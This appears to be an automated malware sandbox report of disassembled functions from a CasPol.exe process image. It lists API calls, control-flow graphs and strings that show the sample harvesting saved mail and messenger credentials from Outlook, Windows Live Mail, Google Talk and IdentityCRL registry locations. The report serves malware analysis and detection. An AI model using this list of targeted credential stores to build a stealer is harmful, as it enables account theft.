                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 317 402c5d-402c81 call 410a9c 320 402da5-402db0 317->320 321 402c87-402cb7 memset call 410b62 317->321 324 402d9c-402d9f RegCloseKey 321->324 325 402cbd-402cbf 321->325 324->320 326 402cc4-402d2d call 410b1e memset sprintf call 410a9c 325->326 331 402d3a-402d6b sprintf call 410a9c 326->331 332 402d2f-402d35 call 402bd1 326->332 336 402d7a-402d8a call 410b62 331->336 337 402d6d-402d75 call 402bd1 331->337 332->331 340 402d8f-402d94 336->340 337->336 340->326 341 402d9a-402d9b 340->341 341->324
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 00402C9D
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • memset.MSVCRT ref: 00402CF7
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00402D10
                                                                                                                                                                                  • sprintf.MSVCRT ref: 00402D4E
                                                                                                                                                                                    • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                                                                                                                                                                    • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                  • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                  • API String ID: 1831126014-3814494228

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                    • Part of subcall function 00410DBB: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                  • memset.MSVCRT ref: 00444379
                                                                                                                                                                                  • memset.MSVCRT ref: 00444394
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                  • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                  • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Store Root, xrefs: 004443A5
                                                                                                                                                                                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                  • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$strlen$Close$EnvironmentExpandFolderPathSpecialStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                  • API String ID: 1502082548-2578778931

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 363 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 368 40f5c3-40f5ea RegQueryValueExA 363->368 369 40f6d9-40f6df 363->369 370 40f6d0-40f6d3 RegCloseKey 368->370 371 40f5f0-40f5f4 368->371 370->369 371->370 372 40f5fa-40f604 371->372 373 40f606-40f618 call 40466b call 404734 372->373 374 40f677 372->374 384 40f66a-40f675 call 404785 373->384 385 40f61a-40f63e call 4047a5 373->385 376 40f67a-40f67d 374->376 376->370 377 40f67f-40f6bf call 4012ee RegQueryValueExA 376->377 377->370 383 40f6c1-40f6cf 377->383 383->370 384->376 385->384 390 40f640-40f643 385->390 391 40f661-40f664 LocalFree 390->391 392 40f645-40f65a memcpy 390->392 391->384 392->391
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                  • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                    • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                  • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2012582556-3916222277

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 393 4037ca-40381c memset * 2 call 444551 396 4038e2-4038e5 393->396 397 403822-403882 call 4021b6 call 406f06 * 2 strchr 393->397 404 403884-403895 _mbscpy 397->404 405 403897-4038a2 strlen 397->405 406 4038bf-4038dd _mbscpy call 4023e5 404->406 405->406 407 4038a4-4038bc sprintf 405->407 406->396 407->406
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                  • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                  • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                  • String ID: %s@yahoo.com
                                                                                                                                                                                  • API String ID: 317221925-3288273942

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 409 4036e5-4036f5 410 4037c6-4037c7 409->410 411 4036fb-403709 call 410863 409->411 413 40370e-403710 411->413 414 4037c5 413->414 415 403716-40372a strchr 413->415 414->410 415->414 416 403730-403787 call 4021b6 _mbscpy * 2 strlen 415->416 419 4037a4-4037c0 _mbscpy call 4023e5 416->419 420 403789-4037a1 sprintf 416->420 419->414 420->419
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                    • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                    • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                    • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                  • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                  • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                  • String ID: %s@gmail.com
                                                                                                                                                                                  • API String ID: 3261640601-4097000612

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 422 4034e4-403544 memset * 2 call 410b1e 425 403580-403582 422->425 426 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 422->426 426->425
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00403504
                                                                                                                                                                                  • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                    • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                  • String ID: InstallPath$Software\Group Mail$fb.dat

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 431 408db6-408dbd 432 408dc4-408dd0 431->432 433 408dbf call 408d34 431->433 435 408de2 432->435 436 408dd2-408ddb 432->436 433->432 439 408de4-408de6 435->439 437 408e0d-408e1c 436->437 438 408ddd-408de0 436->438 437->439 438->435 438->436 440 408f07 439->440 441 408dec-408df2 439->441 442 408f09-408f0b 440->442 443 408df4-408e04 441->443 444 408e1e-408e25 441->444 447 408e05-408e0b 443->447 445 408e27-408e47 _mbscpy call 409240 444->445 446 408e6b-408e7e call 408f0c 444->446 454 408e49-408e59 strlen 445->454 455 408e5b-408e69 445->455 448 408e7f-408e87 LoadStringA 446->448 447->448 453 408e89 448->453 456 408f00-408f05 453->456 457 408e8b-408e9a 453->457 454->453 454->455 455->447 456->442 457->456 458 408e9c-408ea8 457->458 458->456 459 408eaa-408efe memcpy 458->459 459->440 459->456
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00409240: _itoa.MSVCRT ref: 00409261
                                                                                                                                                                                  • strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  • LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D5C
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D7A
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408D98
                                                                                                                                                                                    • Part of subcall function 00408D34: ??2@YAPAXI@Z.MSVCRT ref: 00408DA8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408DCA
                                                                                                                                                                                  • strings, xrefs: 00408E27
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$LoadString_itoa_mbscpymemcpystrlen
                                                                                                                                                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$strings

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  control_flow_graph 460 410863-41088b UuidFromStringA * 2 461 4108dd 460->461 462 41088d-41088f 460->462 463 4108df-4108e2 461->463 462->461 464 410891-4108aa call 410827 462->464 466 4108af-4108b1 464->466 466->461 467 4108b3-4108b9 466->467 468 4108bb-4108bd 467->468 469 4108be-4108db memcpy CoTaskMemFree 467->469 468->469 469->463
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                  • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                  • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                    • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                  • String ID: ACD
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 00408620
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • memset.MSVCRT ref: 00408671
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                  • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                  • API String ID: 1366857005-1079885057
                                                                                                                                                                                  • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                  • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                    • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                  • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                  • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                    • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressCloseFolderLibraryLoadPathProcSpecialVersion_mbscpymemset
                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                  • API String ID: 3929982141-2036018995
                                                                                                                                                                                  • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                  • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                  • API String ID: 882979914-1578091866
                                                                                                                                                                                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                    • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                  • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3143880245-0
